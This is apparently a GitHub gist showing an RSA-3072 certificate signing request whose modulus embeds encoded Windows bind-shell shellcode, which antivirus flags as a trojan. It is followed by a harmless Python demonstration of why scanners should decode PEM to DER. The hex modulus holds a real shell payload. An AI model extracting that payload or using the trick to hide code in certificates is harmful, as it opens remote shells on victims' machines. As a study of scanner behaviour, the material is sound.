@CBonnell
Last active December 5, 2021 00:03
Vanity RSA key with Windows bind shellcode in modulus
WARNING: This key is extremely weak and should not be used for anything.
Vanity RSA-3072 key with Windows bind shellcode in the modulus. The DER encoding of the CSR below is detected by ClamAV as a trojan: https://www.virustotal.com/gui/file/b757330297ddccd7ec1fdac846dc7a69b1e75541b53ba8b8a508b0370c7b23da/detection
Certificate Request:
Data:
Version: 1 (0x0)
Subject: C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (3072 bit)
Modulus:
00:bb:78:d0:11:e9:da:d8:d9:74:24:f4:58:31:c9:
b1:59:31:58:13:83:c0:04:03:58:77:32:e4:53:15:
11:ea:ff:c0:91:2c:8b:d6:e9:94:47:df:a3:79:2b:
1c:c7:4c:78:b2:cb:fd:6e:c2:9d:53:59:a6:37:c3:
57:11:c8:77:77:9e:6d:fc:58:ba:82:f9:c0:9a:35:
72:7d:01:9b:e7:31:16:82:f6:e2:89:89:75:67:f7:
aa:ae:73:88:3f:f5:6d:3d:9e:ab:06:da:ff:42:7a:
63:6b:72:59:f6:58:a5:fe:3f:0b:41:a0:f2:fe:2d:
c9:32:3d:d4:51:f7:a7:56:f8:69:08:4d:27:8a:2e:
19:99:7c:fc:63:fa:5c:d5:a8:1f:a8:9b:88:bb:a5:
3c:8f:7f:38:45:d1:71:34:59:84:b0:97:a0:99:cc:
fe:7f:37:e2:28:ea:57:01:cf:f8:1e:1e:d8:d3:05:
67:73:f9:32:bb:76:8c:7c:2f:f6:29:0f:a5:36:2e:
73:de:31:c3:fe:ae:49:64:d2:39:f1:f2:c7:a0:06:
d3:f6:1a:fe:0a:fe:28:be:1a:42:9c:de:01:16:27:
bd:29:1c:f8:7d:47:2c:68:06:0e:23:31:fe:7d:58:
e8:7b:76:4b:fe:db:17:51:fa:df:ff:a1:bc:c5:66:
4b:ea:23:86:47:b4:e7:d5:71:77:2e:24:4a:3d:b1:
6f:12:f2:b2:d0:55:c9:23:2e:c2:a5:73:b2:c8:b7:
7d:6b:55:29:bc:26:dd:f6:e3:f6:25:c6:5c:ad:9c:
9d:18:08:3b:bf:d2:ff:92:18:5f:48:9b:e0:7b:03:
a5:32:11:27:2b:25:cd:44:db:bd:b9:cd:48:da:56:
4c:56:d5:04:87:48:3a:6b:9c:2a:15:4d:bc:0b:56:
06:b5:c9:46:d0:fa:68:a6:76:e9:52:2c:24:62:28:
e1:1d:87:b0:66:93:85:8f:87:0f:cf:16:29:76:03:
55:0c:0e:3f:17:ac:00:80:00:1d
Exponent: 65537 (0x10001)
Attributes:
a0:00
Signature Algorithm: sha256WithRSAEncryption
5e:2d:5a:d4:e4:a6:e9:59:72:5f:7b:2a:83:29:6c:4e:5b:03:
2b:dd:f1:a1:93:1b:4a:c8:33:3a:03:c7:66:8c:c9:24:fb:b1:
00:fd:d9:f4:8b:cf:e5:d8:12:98:93:00:c1:ff:d2:01:fe:59:
25:f4:27:f3:73:43:7e:2c:1b:c9:82:83:4e:53:03:80:f7:d1:
27:66:9c:0c:3d:b0:76:de:46:0c:33:a3:21:c9:6c:d1:de:9e:
25:e4:78:bb:78:90:09:17:f4:1a:d1:b3:bb:2d:65:0e:5c:e4:
d8:82:f8:39:c2:95:93:59:8a:45:9e:c3:4d:81:44:ea:bf:62:
a9:a8:3c:5b:27:2f:93:86:61:0e:01:3c:0d:1b:79:c4:87:22:
5b:de:5d:7e:d6:41:d7:f7:0c:71:d7:f9:2f:ee:0d:ad:ad:45:
fe:d6:7a:81:dd:33:60:39:0c:ef:44:10:f7:fb:2f:aa:00:28:
57:5f:f9:ab:64:33:fc:bc:8c:70:f8:50:3c:ff:32:07:82:18:
06:29:ba:68:da:4b:58:68:bf:35:00:27:81:61:da:67:99:dc:
2d:87:f6:10:e7:cb:dd:85:38:ac:db:08:02:2f:ac:2d:9e:22:
b8:e7:d3:f1:c7:61:22:84:86:52:27:9b:a3:10:00:5e:88:ac:
0c:b1:c3:4b:04:e2:6b:af:6b:e5:dc:50:56:1d:ab:4a:63:10:
e6:86:f7:c8:8a:27:c9:1c:7e:d2:5b:74:0c:0a:b1:d6:fc:e6:
bd:db:88:51:60:08:c2:76:3c:41:28:3e:79:59:98:69:be:69:
fb:8b:d3:d9:6c:d9:10:4f:3c:ea:28:ce:86:f7:3f:1c:f0:eb:
73:e0:4f:e8:a9:69:75:9f:47:a1:e3:cd:e3:10:40:99:3c:6c:
0a:85:c3:4b:44:f1:ab:8d:a0:52:96:fa:8f:8c:2c:14:82:8a:
4c:cd:67:d2:7e:74:47:65:62:12:6d:55:38:b5:9d:20:a3:d9:
9e:6a:f3:9e:82:3e
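The description above names the DER encoding specifically as what gets flagged. DER stores an INTEGER's content octets verbatim, so any byte pattern inside the modulus appears unchanged in the file, while the base64 PEM form only exposes it after decoding. The following is an added example, not part of the gist: it uses a constructed harmless marker in place of a real signature, a constructed value that is not a real RSA key, and hypothetical helper names.

```python
import base64

# Constructed, harmless stand-in for an antivirus byte signature.
MARKER = b"CONSTRUCTED-TEST-SIGNATURE"

def der_len(n: int) -> bytes:
    """DER definite-length octets (short or long form)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def der_integer(value: int) -> bytes:
    """DER INTEGER: big-endian, 0x00-prefixed when the top bit is set."""
    body = value.to_bytes(value.bit_length() // 8 + 1, "big")
    return b"\x02" + der_len(len(body)) + body

def rsa_public_key_der(n: int, e: int) -> bytes:
    """RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }"""
    body = der_integer(n) + der_integer(e)
    return b"\x30" + der_len(len(body)) + body

def to_pem(der: bytes, label: bytes) -> bytes:
    return (b"-----BEGIN " + label + b"-----\n" + base64.encodebytes(der)
            + b"-----END " + label + b"-----\n")

def raw_scan(blob: bytes) -> bool:
    """Naive byte-pattern match, blind to ASN.1 and PEM structure."""
    return MARKER in blob

def pem_aware_scan(blob: bytes) -> bool:
    """Match the raw bytes, then the base64-decoded PEM body as well."""
    if raw_scan(blob):
        return True
    body = b"".join(l for l in blob.splitlines() if not l.startswith(b"-----"))
    try:
        return raw_scan(base64.b64decode(body, validate=True))
    except ValueError:  # not base64, so not a PEM body
        return False

def build_sample() -> bytes:
    """384-byte value shaped like a 3072-bit modulus (constructed, not a real key)."""
    raw = b"\xbb" + MARKER + b"\x01" * (384 - 1 - len(MARKER))
    return rsa_public_key_der(int.from_bytes(raw, "big"), 65537)

if __name__ == "__main__":
    der = build_sample()
    pem = to_pem(der, b"RSA PUBLIC KEY")
    print(raw_scan(der), raw_scan(pem), pem_aware_scan(pem))
```

A scanner or linter that inspects certificate material should decode PEM to DER before pattern matching, since the same key bytes are invisible to a raw match on the base64 text.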